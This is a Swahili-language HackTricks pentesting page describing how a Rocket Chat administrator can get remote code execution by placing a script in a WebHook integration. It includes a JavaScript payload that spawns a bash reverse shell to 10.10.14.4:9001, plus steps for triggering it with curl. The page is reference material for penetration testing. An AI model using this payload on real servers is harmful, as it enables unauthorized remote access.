hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md
2024-02-11 02:13:58 +00:00

3.8 KiB

Rocket Chat

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

RCE

Ikiwa wewe ni msimamizi ndani ya Rocket Chat, unaweza kupata RCE.

  • Nenda kwenye Integrations na chagua New Integration na chagua moja kati ya: Incoming WebHook au Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Sanidi WebHook (kituo na chapisha kama jina la mtumiaji lazima kuwepo):
  • Sanidi skripti ya WebHook:
  • Hifadhi mabadiliko
  • Pata URL ya WebHook iliyozalishwa:
  • Piga simu na curl na unapaswa kupokea rev shell
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: